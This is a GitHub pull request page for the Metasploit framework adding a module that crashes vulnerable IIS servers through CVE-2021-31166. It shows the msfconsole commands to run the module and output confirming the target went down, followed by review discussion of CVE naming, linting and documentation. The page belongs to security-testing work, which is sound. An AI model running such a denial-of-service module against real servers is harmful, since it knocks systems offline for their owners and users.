Add CVE-2021-31166 DoS Module #16284

Merged
merged 6 commits into from
Mar 16, 2022
Conversation

mauricelambert
Contributor

@mauricelambert mauricelambert commented Mar 5, 2022

  • This module performs a DoS attack using a simple HTTP request
  • CVE-2021-31166: HTTP Protocol Stack Remote Code Execution Vulnerability
  • Causes a Blue Screen

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/windows/iis/rb_dos_iis_2021_31166
  • set RHOST <ip>
  • exploit

Output

msf6 > use exploit/windows/iis/rb_dos_iis_2021_31166
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) > exploit
[*] Running module against 10.10.10.10

[+] Target is down.
[*] Auxiliary module execution completed
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) >
msf6 > use exploit/windows/iis/rb_dos_iis_2021_31166 
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) > set RPORT 80
RPORT => 80
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) > set TARGETURI "/test/"
TARGETURI => /test/
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) > exploit
[*] Running module against 192.168.56.9

[*] Trying first connection...
[+] First connection OK. Sending payload...
[+] Payload is sent. Check that the server is down...
[-] The connection was refused by the remote host (10.10.10.10:80).
[+] Target is down.
[*] Auxiliary module execution completed
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) >

@gwillcox-r7
Contributor

gwillcox-r7 commented Mar 10, 2022

@mauricelambert This appears to be a PoC for CVE-2021-31166, not for CVE-2022-21907 as mentioned at https://isc.sans.edu/diary/28234. In https://isc.sans.edu/diary/28234 we can see the new vuln is related to the trailer feature, not the Accept-Encoding header that CVE-2021-31166 was originally related to.

Therefore I don't think we should be accepting this as a CVE-2022-21907 exploit, and I would also question whether this has been tested against a machine that has been patched for CVE-2021-31166 but not for CVE-2022-21907. This is a common mistake others have made and it has led to much confusion over the last month.

As far as I am aware there has been no public PoC for CVE-2022-21907; however, if one did exist it should use the Trailer: header, though according to https://isc.sans.edu/diary/28234 the RFC notes that the sender SHOULD generate this header, suggesting it's not mandatory.

@smcintyre-r7 smcintyre-r7 added module docs rn-modules release notes for new or majorly enhanced modules labels Mar 10, 2022
@mauricelambert
Contributor Author

Thanks for the analysis. Indeed you are right, my system is not patched, therefore I modified the name of the CVE and the documentation. I will try to mount a system vulnerable to CVE-2022-21907 and try to find a working exploit (I am not a Microsoft/Windows expert, so it is unlikely that I will find it).

@gwillcox-r7 gwillcox-r7 added the needs-linting The module needs additional work to pass our automated linting rules label Mar 14, 2022
@github-actions

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. These can be run from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.


## Scenarios

Contributor

Suggested change:
### Windows XXX running IIS XXX with <MONTH> <YEAR> Patches

Contributor Author

@mauricelambert mauricelambert Mar 16, 2022


I will add the configuration of my Virtual Machine. I print it in the demonstration (gif in the documentation), but the gif is too big to be loaded in the markdown.

Contributor


Doesn't look like this was updated @mauricelambert?

Contributor Author

@mauricelambert mauricelambert Mar 16, 2022


Do you want me to add the version and patch like this:

Windows 10 20H2 19042.804 running IIS with November 22, 2021 Patches (KB5007253)

Thanks for the commits, I worked on the description but it is less detailed than yours.

@gwillcox-r7
Contributor

LGTM and tested this successfully. Thanks @mauricelambert! Will land this once tests pass.

@gwillcox-r7 gwillcox-r7 changed the title from "Add auxiliary module for DOS IIS Server" to "Add CVE-2021-31166 DoS Module" Mar 16, 2022
@gwillcox-r7 gwillcox-r7 merged commit e197669 into rapid7:master Mar 16, 2022
@gwillcox-r7
Contributor

Release Notes

A new module has been added that exploits CVE-2021-31166, a UAF bug in http.sys when parsing Accept-Encoding headers, to cause a BSoD and denial of service on vulnerable IIS servers.

@gwillcox-r7 gwillcox-r7 removed the needs-linting The module needs additional work to pass our automated linting rules label Mar 16, 2022